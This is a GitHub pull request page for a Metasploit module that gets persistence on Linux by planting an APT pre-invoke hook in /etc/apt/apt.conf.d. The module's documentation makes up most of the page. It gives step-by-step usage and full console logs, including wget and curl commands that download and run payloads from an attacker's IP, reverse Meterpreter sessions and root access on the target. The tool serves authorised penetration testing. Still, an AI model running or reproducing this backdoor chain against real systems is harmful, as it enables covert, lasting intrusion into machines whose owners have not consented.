Skip to content

update apt_package_manager to persistence mixin #20495

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
wants to merge 2 commits into
base: master
Choose a base branch
from
+249 −169
Open

update apt_package_manager to persistence mixin #20495

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
2 commits
Select commit Hold shift + click to select a range
c3f3591
update apt_package_manager to persistence mixin
h00die Aug 24, 2025
e6177d6
persistence apt cleanup updates
h00die Sep 1, 2025
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
66 changes: 0 additions & 66 deletions documentation/modules/exploit/linux/local/apt_package_manager_persistence.md
View file
Open in desktop

This file was deleted.

138 changes: 138 additions & 0 deletions documentation/modules/exploit/linux/persistence/apt_package_manager.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,138 @@
## Vulnerable Application

This module will run a payload when the apt package manager is used.
This module creates a pre-invoke hook for APT in `apt.conf.d`.
The hook name syntax is numeric followed by text.

Verified on Ubuntu 22.04

## Verification Steps

1. Exploit a box that uses APT
2. Obtain root persmissions, or enough permissions to edit the `apt.conf.d` folder
3. `use exploit/linux/persistence/apt_package_manager`
4. `set SESSION <id>`
5. `set PAYLOAD cmd/unix/reverse_python` configure the payload as needed
6. `exploit`

When the system runs `apt-get update` the payload will launch.

## Options

### PAYLOAD_NAME

Name of backdoor executable. Defaults to a random name

### HOOKNAME

Name of pre-invoke hook to be installed in `/etc/apt/apt.conf.d/`. Pre-invoke hook name syntax is numeric followed by text.

## Scenarios

### Tested on Ubuntu 22.04

Initial access vector via web delivery

```
$ ./msfconsole -q
[*] Processing /root/.msf4/msfconsole.rc for ERB directives.
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 111.111.1.111
lhost => 111.111.1.111
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set srvport 8181
srvport => 8181
resource (/root/.msf4/msfconsole.rc)> set target 7
target => 7
resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4545
lport => 4545
resource (/root/.msf4/msfconsole.rc)> set URIPATH l
URIPATH => l
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Starting persistent handler(s)...
[*] Started reverse TCP handler on 111.111.1.111:4545
[*] Using URL: http://111.111.1.111:8181/l
[*] Server started.
[*] Run the following command on the target machine:
wget -qO Z73D1DUW --no-check-certificate http://111.111.1.111:8181/l; chmod +x Z73D1DUW; ./Z73D1DUW& disown
[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) >
[*] 222.222.2.22 web_delivery - Delivering Payload (250 bytes)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 222.222.2.22
[*] Meterpreter session 1 opened (111.111.1.111:4545 -> 222.222.2.22:51076) at 2025-02-04 17:40:52 -0500
sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/linux root @ 222.222.2.22 111.111.1.111:4545 -> 222.222.2.22:51076 (222.222.2.22)
```

Persistence

```
[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/linux/persistence/apt_package_manager
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
[msf](Jobs:1 Agents:1) exploit(linux/persistence/apt_package_manager) > set session 1
session => 1
[msf](Jobs:1 Agents:1) exploit(linux/persistence/apt_package_manager) > check
[*] The target appears to be vulnerable. /etc/apt/apt.conf.d/ and /tmp/ are writable, also found apt-get.
[msf](Jobs:1 Agents:1) exploit(linux/persistence/apt_package_manager) > exploit
[*] Command to run on remote host: curl -so ./xTOLdQoOTv http://111.111.1.111:8080/Hg3DGEu9GqlWD06kh4AzFg;chmod +x ./xTOLdQoOTv;./xTOLdQoOTv&
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[msf](Jobs:2 Agents:1) exploit(linux/persistence/apt_package_manager) >
[*] Fetch handler listening on 111.111.1.111:8080
[*] HTTP server started
[*] Adding resource /Hg3DGEu9GqlWD06kh4AzFg
[*] Started reverse TCP handler on 111.111.1.111:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. /etc/apt/apt.conf.d/ and /tmp/ are writable, also found apt-get.
[*] Attempting to write hook:
[*] Wrote /etc/apt/apt.conf.d/76skoGqswo
[*] Backdoor uploaded /tmp/erNOJV96u
[+] Backdoor will run on next APT update
[*] Meterpreter-compatible Cleaup RC file: /root/.msf4/logs/persistence/222.222.2.22_20250204.4245/222.222.2.22_20250204.4245.rc
[msf](Jobs:2 Agents:1) exploit(linux/persistence/apt_package_manager) > jobs
Jobs
====
Id Name Payload Payload opts
-- ---- ------- ------------
0 Exploit: multi/script/web_delivery linux/x64/meterpreter/reverse_tcp tcp://111.111.1.111:4545
1 Exploit: linux/persistence/apt_package_manager cmd/linux/http/x64/meterpreter/reverse_tcp tcp://111.111.1.111:4444
[msf](Jobs:2 Agents:1) exploit(linux/persistence/apt_package_manager) >
```

Run `sudo apt-get update` on the target.

```
[*] Client 222.222.2.22 requested /Hg3DGEu9GqlWD06kh4AzFg
[*] Sending payload to 222.222.2.22 (curl/7.81.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 222.222.2.22
[*] Meterpreter session 2 opened (111.111.1.111:4444 -> 222.222.2.22:49804) at 2025-02-04 17:43:06 -0500
[msf](Jobs:2 Agents:2) exploit(linux/persistence/apt_package_manager) > sessions -i 2
[*] Starting interaction with 2...
(Meterpreter 2)(/tmp) > sysinfo
Computer : 222.222.2.22
OS : Ubuntu 22.04 (Linux 5.15.0-48-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
(Meterpreter 2)(/tmp) >
```

#### Cleanup

```
(Meterpreter 2)(/tmp) > resource /root/.msf4/logs/persistence/222.222.2.22_20250204.4245/222.222.2.22_20250204.4245.rc
[*] Processing /root/.msf4/logs/persistence/222.222.2.22_20250204.4245/222.222.2.22_20250204.4245.rc for ERB directives.
resource (/root/.msf4/logs/persistence/222.222.2.22_20250204.4245/222.222.2.22_20250204.4245.rc)> rm /etc/apt/apt.conf.d/76skoGqswo
resource (/root/.msf4/logs/persistence/222.222.2.22_20250204.4245/222.222.2.22_20250204.4245.rc)> rm /tmp/erNOJV96u
```
103 changes: 0 additions & 103 deletions modules/exploits/linux/local/apt_package_manager_persistence.rb
View file
Open in desktop

This file was deleted.

Loading